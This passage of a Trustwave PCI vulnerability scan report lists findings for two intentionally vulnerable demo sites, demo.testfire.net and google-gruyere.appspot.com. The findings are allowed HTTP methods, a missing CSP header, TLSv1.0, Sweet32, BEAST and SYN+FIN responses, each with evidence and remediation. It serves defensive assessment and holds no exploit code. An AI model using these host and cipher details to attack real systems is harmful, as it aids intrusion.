# CVE Number Vulnerability Severity Details
Score Status
Service: http

489 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/sendFeedback


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

490 Website Detected 0.0 Info Pass URL: https://demo.testfire.net/


Port: tcp/443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

491 Discovered HTTP Methods 0.0 Info Pass URL: https://65.61.137.117/swagger/


Port: tcp/443

Requesting the allowed HTTP OPTIONS from this host shows which

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 800 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

492 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
Hostname: altoromutual.com, Source: SSL Certificate Subject Common
Name
Hostname: altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: www.altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: demo.testfire.net, Source: SSL Certificate Subject
subjectAltName DNS

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 801 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
No action is required.

493 Enumerated Applications 0.0 Info Pass URL: http://demo.testfire.net:8080/


Port: tcp/8080

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

494 Insecure or no Content- 0.0 Info Pass URL: http://demo.testfire.net:8080/


Security-Policy header Port: tcp/8080

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 802 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282;
Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:32:24 GMT
Content-Length: 9369

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 803 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 804 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 805 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 806 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 807 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 808 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170"


height="113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 809 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 810 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 811 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 TLSv1.0 Supported 10.0 High Fail Port: tcp/443

This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.

CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https

Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_E
arly_TLS_Information%20Supplement_v1.pdf

https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%2
03%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-
Dead--An-Update-on-the-PCI-relevance-of-
SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA

Remediation:
The server should be configured to disable the use of the TLSv1.0

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 812 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.

2 CVE-2016-2183 Block cipher algorithms 5.0 Medium Fail Port: tcp/443


with block size of 64 bits
(like DES and 3DES) This is a cipher vulnerability, not limited to any specific SSL/TLS
birthday attack known as software implementation. DES and Triple DES (3DES) block ciphers with
Sweet32 a block size of 64 bits, have a birthday bound of approximately 4 billion
blocks (or 2 to the power of 32, hence the name of this vulnerability). A
man-in-the-middle (MitM) attacker, who is able to capture a large
amount of encrypted network traffic, can recover sensitive plain text
data.

NOTE: Cipher block size must not be confused with key length. DES /
3DES ciphers are vulnerable because they always operate on 64 bit
blocks regardless of the key length. If this vulnerability is detected, and
in the list of detected ciphers you see only entries with numbers
different than 64 (eg. TLSv1 112 bits ECDHE-RSA-DES-CBC3-SHA), the
detection is still valid, because '112 bits' is the key length.

CVE: CVE-2016-2183
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 813 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
https://access.redhat.com/security/cve/cve-2016-2183
https://sweet32.info/
https://www.openssl.org/blog/blog/2016/08/24/sweet32/

Evidence:
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA

Remediation:
This issue can by avoided by disabling block ciphers of 64 bit block
length (like DES/3DES) in all the SSL/TLS servers. Exact procedure
depends on the actual implementation. Please refer to the
documentation of your SSL/TLS server software and actual service
software (http server, mail server, etc).

NOTE 1: This finding is based on a live test that actually detects which
ciphers are supported by the server. It is very important to note that in
many cases, a software update (backported version provided by
Operating System vendor or "vanilla" release taken directly from
SSL/TLS vendor) won't be enough to resolve this issue. Usually software
update doesn't overwrite manually tweaked configuration files, which
means, DES/3DES can be still available, even if the software update
disables them by default.

NOTE 2: On Windows 7/10 systems running RDP (Remote Desktop


Protocol), the vulnerable cipher that should be disabled is labeled
'TLS_RSA_WITH_3DES_EDE_CBC_SHA'.

NOTE 3: If disabling 64 bit block ciphers is not possible, please limit the
number of requests client can make in a single TLS session and / or the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 814 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
keep-alive timeout value. As stated before, successful attack requires
huge amounts of data gathered in a single TLS session (without
rekeying).

3 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.

CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https

Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 815 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA

Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.

4 System Responds to 0.0 Low Pass Port: tcp/80


SYN+FIN TCP Packets
This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Reference:
http://www.kb.cert.org/vuls/id/464113

Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 816 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

5 System Responds to 0.0 Low Pass Port: tcp/443


SYN+FIN TCP Packets
This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
http://www.kb.cert.org/vuls/id/464113

Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

6 Wildcard SSL Certificate 0.0 Info Pass Port: tcp/443


Detected
An SSL certificate with a wildcarded common name (CN) record (e.g.,
*.mydomain.com) was detected on this service.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 817 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.appspot.com

Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.

7 Enumerated SSL/TLS Cipher 0.0 Info Pass Port: tcp/443


Suites
The finding reports the SSL cipher suites for each SSL/TLS service
version provided by the remote service. This finding does not represent
a vulnerability, but is only meant to provide visibility into the behavior
and configuration of the remote SSL/TLS service.
The information provided as part of this finding includes the SSL
version (ex: TLSv1) as well as the name of the cipher suite (ex: RC4-
SHA).

A cipher suite is a set of cryptographic algorithms that provide


authentication, encryption, and message authentication code (MAC) as
part of an SSL/TLS negotiation and through the lifetime of the SSL
session. It is typical that an SSL service would support multiple cipher
suites. A cipher suite can be supported by across multiple SSL/TLS

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 818 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
versions, so you should be of no concern to see the same cipher name
reported for multiple

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
http://www.openssl.org/docs/apps/ciphers.html

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : AES128-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : AES128-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 819 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
No remediation is necessary.

8 SSL Certificate Expiring 0.0 Info Pass Port: tcp/443


Soon
This SSL certificate is currently valid; however, it is set to expire in the
near future.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Expiration Date: 2019-10-21 18:23:00 UTC
Days to expiration: 76

Remediation:
Contact your Certificate Authority (CA) to have a new certificate issued
prior to the expiration date. Please note the port associated with this
finding. This finding may NOT be originating from port 443, which is
what most online testing tools check by default.

9 Wildcard SSL Certificate 0.0 Info Pass Port: tcp/443


Detected
An SSL certificate with a wildcarded common name (CN) record (e.g., *.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 820 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
mydomain.com) was detected on this service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.thinkwithgoogle.com

Remediation:
